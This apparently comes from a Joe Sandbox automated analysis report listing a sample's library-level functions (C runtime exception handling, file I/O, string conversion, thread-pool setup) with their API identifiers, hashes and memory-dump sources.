                                                                                • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                • Instruction Fuzzy Hash: F821D02D908BC7C2EA108B15A84817527A0FB49F8CF280036D9ADA3362DF3DEC848341
                                                                                Function 00007FF65595BFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                • Instruction ID: ad199a47af0c4ff27a43fe4599fb3813b4152381c4077a755224afdaf6ccd689
                                                                                • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                • Instruction Fuzzy Hash: 01F06829A19BC281EF448B11F45827963A0EF88F98F4C1035E94F96666DF3CD898C780
                                                                                Function 00007FF6559645C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                • Instruction ID: 009c771abf59d4cbc47cc601f8162263bfa1161580d3962a3b3ef5e0a6168c51
                                                                                • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                • Instruction Fuzzy Hash: B081D2AAE1879245F7109BA588886BC26A0BB45F8CF4C4135CD0FE3A97CF3CAC59C751
                                                                                Function 00007FF655933AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2398171386-0
                                                                                • Opcode ID: d0479325b88890862111e7aa44f383cc57eeb18b26d51e7f766025fa2f1e620b
                                                                                • Instruction ID: 5022040112f7076b6ac22ef2adc89b17a8d20e9fcaaaaa927a45f78acc0d5011
                                                                                • Opcode Fuzzy Hash: d0479325b88890862111e7aa44f383cc57eeb18b26d51e7f766025fa2f1e620b
                                                                                • Instruction Fuzzy Hash: 5751D32AB04B8299FB108B69E4483BD23B1AB44BACF194635DE1DA67D6DF3C9845C300
                                                                                Function 00007FF655963F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                • String ID:
                                                                                • API String ID: 3659116390-0
                                                                                • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                • Instruction ID: ba6963f0b09631bf3f20b6651ecac1fd80424954e9941a711c58ade8606eddfc
                                                                                • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                • Instruction Fuzzy Hash: FE51D176A14A9185E710CB65D4883AC3BB1FB54B9CF088135CE4EA7A9ADF3CD549C740
                                                                                Function 00007FF655951E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocString
                                                                                • String ID:
                                                                                • API String ID: 262959230-0
                                                                                • Opcode ID: 0c9fa0c6bf819422fbbcbf8a1cc47624dda944ba8802b04b3bf134fe07a1f51e
                                                                                • Instruction ID: a24e25b390d5dd75f8b0b7fbd3fb0191d33c89ea249bbddcc1ae8b1f39d658ad
                                                                                • Opcode Fuzzy Hash: 0c9fa0c6bf819422fbbcbf8a1cc47624dda944ba8802b04b3bf134fe07a1f51e
                                                                                • Instruction Fuzzy Hash: 0341C539A0978589EB149F2194482B82291EF04FA9F1C4634EAADE77D7EF3CD8659340
                                                                                Function 00007FF65595F414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID:
                                                                                • API String ID: 190572456-0
                                                                                • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                • Instruction ID: c99885de27083d4f0768ce53a6cdbbfe949115e02416b99f158ef383a3e2a3f8
                                                                                • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                • Instruction Fuzzy Hash: A44128AAB19A8281FA168F12A80C6752396BF44FE8F0D4535DD1DDB746EF3CE8118340
                                                                                Function 00007FF6559656D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                • Instruction ID: 688f17a2d45195a6ec1544f4585d0991a060145b0a5f503da2055f9465e885a8
                                                                                • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                • Instruction Fuzzy Hash: F511907EE1878791FB640124E58937901416F54BA8ECC4230EA7DE65D78F2CEC484186
                                                                                Function 00007FF65595625C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: __except_validate_context_recordabort
                                                                                • String ID: csm$csm
                                                                                • API String ID: 746414643-3733052814
                                                                                • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                • Instruction ID: 8a5cd47d92edb23714e051540a55a7049d17142b447b37a3f50a595bcc905ae5
                                                                                • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                • Instruction Fuzzy Hash: DF71AF6A6086C186D7618F25D05877D7BA0EF01F8EF089135DA8DA7A86CF3CE8A1C740
                                                                                Function 00007FF6559580F4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: $*
                                                                                • API String ID: 3215553584-3982473090
                                                                                • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                • Instruction ID: e81c4e3d64b8a0a93596ea65a24d1b2ff676fd5f04de09b11b24b0c848031a92
                                                                                • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                • Instruction Fuzzy Hash: 5751347A90C6828AE7648E28845D3B83BA1EF05F5EF6C1135C64AE119ACF6CDCA5C705
                                                                                Function 00007FF655961758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$StringType
                                                                                • String ID: $%s
                                                                                • API String ID: 3586891840-3791308623
                                                                                • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                • Instruction ID: 5f055d424d5c260f082f5172f6eb6362b5bbdb67cecf4cc5cb0d8047ce28fcf9
                                                                                • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                • Instruction Fuzzy Hash: CB416026B15BC18AEF618F25D8082A96291FB44FACF4C4235DE1DA77C6DF3CE9458380
                                                                                Function 00007FF6559566A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                • String ID: csm
                                                                                • API String ID: 2466640111-1018135373
                                                                                • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                • Instruction ID: 74326094f1ead601a8ee9d24fe2f9ceb4f529220e7b7e646826f4a1f04be9697
                                                                                • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                • Instruction Fuzzy Hash: BD51707A61978187DA60AB25E04426E77A4FB88F95F480134DB8D97B57CF3CE860CB01
                                                                                Function 00007FF655964360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                • String ID: U
                                                                                • API String ID: 2456169464-4171548499
                                                                                • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                • Instruction ID: 552044d263f04da34a30c94dabd22738d7c15a6936b59761a0676385c13008ff
                                                                                • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                • Instruction Fuzzy Hash: 8241C366618BC182DB108F65E8493B967A0FB88B98F484031EE4ED7789EF3CD845C740
                                                                                Function 00007FF6559490B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectRelease
                                                                                • String ID:
                                                                                • API String ID: 1429681911-3916222277
                                                                                • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                • Instruction ID: bdf12429366fc851a1708c76e116f01581a0c0f4634fe8a6e0288bc9ffc5d774
                                                                                • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                • Instruction Fuzzy Hash: 5931203961878287DB14DF12B81862A7761F789FD5F544839ED4A93755CF3CE849CB00
                                                                                Function 00007FF65593E870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(?,?,?,00007FF65594317F,?,?,00001000,00007FF65592E51D), ref: 00007FF65593E8BB
                                                                                • CreateSemaphoreW.KERNEL32(?,?,?,00007FF65594317F,?,?,00001000,00007FF65592E51D), ref: 00007FF65593E8CB
                                                                                • CreateEventW.KERNEL32(?,?,?,00007FF65594317F,?,?,00001000,00007FF65592E51D), ref: 00007FF65593E8E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                • String ID: Thread pool initialization failed.
                                                                                • API String ID: 3340455307-2182114853
                                                                                • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                • Instruction ID: 27e520dbd783e1f98d3ce21c2bfe88f48ad4e9486d4ec0197352078afb23e304
                                                                                • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                • Instruction Fuzzy Hash: 7421A236E15682C6F7508F24D4487B936E2EB98F0CF1D8038CA0D9A296DF7EAC55C784
                                                                                Function 00007FF6559485E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDeviceRelease
                                                                                • String ID:
                                                                                • API String ID: 127614599-3916222277
                                                                                • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                • Instruction ID: 0df41683e291d4d4846fb4c2995a282197a58a79db27d893df1cae252b5ceb25
                                                                                • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                • Instruction Fuzzy Hash: 8AE08C24B0868282EB085BB6B59D02A2261AB4CFD0F198439EA1A83795CF3CC8844300
                                                                                Function 00007FF65592D1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                                • String ID:
                                                                                • API String ID: 1137671866-0
                                                                                • Opcode ID: b1749055231bbdb6a6130f4ebdb939a528d16dbded721961105840a11406723d
                                                                                • Instruction ID: a0c9c52a40278ff5589457410e5572a462f9668c35ded30dc15e882358582a11
                                                                                • Opcode Fuzzy Hash: b1749055231bbdb6a6130f4ebdb939a528d16dbded721961105840a11406723d
                                                                                • Instruction Fuzzy Hash: 59A1D666B18BC281EA10DB64E8481ED6361FFC5B88F445131EA5DA7AEBDF3CE945C700
                                                                                Function 00007FF655940548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
